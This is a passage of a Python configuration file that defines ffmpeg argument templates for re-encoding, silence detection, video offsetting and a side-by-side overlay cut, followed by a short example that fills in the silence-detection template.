ultrafast -threads 0 -af \"volume=1dB\" -y '\n\nCAMERA_REENCODE_TEMPLATE = r'-y -i {0} -c copy {1}' # should reencode .TS to .mp4\n\nTABLET_REENCODE_TEMPLATE = r'-y -i {0} -c:v copy {1}' # should reencode .mkv to .mp4\n\nSILENCE_DETECT_TEMPLATE = r'-i {} -af silencedetect=n={}:d={} -f null -'\n\nVIDEO_OFFSET_TEMPLATE = r'-y -itsoffset {0} -i {1} -async 1 {2}' # 0 - duration, 1 - input file, 2 - output file\n\nRAW_CUT_TEMPLATE = r' -i {0} -i {1} -filter_complex ' \\\n '\"[0:v]setpts=PTS-STARTPTS, pad=iw*2:ih[bg]; ' \\\n '[1:v]setpts=PTS-STARTPTS[fg]; [bg][fg]overlay=w; ' \\\n 'amerge,pan=stereo:c0
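# Illustrative sketch (hedged): the *_TEMPLATE settings above are plain
# str.format() templates filled in before shelling out to the binary at
# FFMPEG_PATH; the filename and threshold values here are made up for the
# example.
SILENCE_DETECT_TEMPLATE = r'-i {} -af silencedetect=n={}:d={} -f null -'
args = SILENCE_DETECT_TEMPLATE.format("lecture.mp4", "-30dB", 2)
assert args == '-i lecture.mp4 -af silencedetect=n=-30dB:d=2 -f null -'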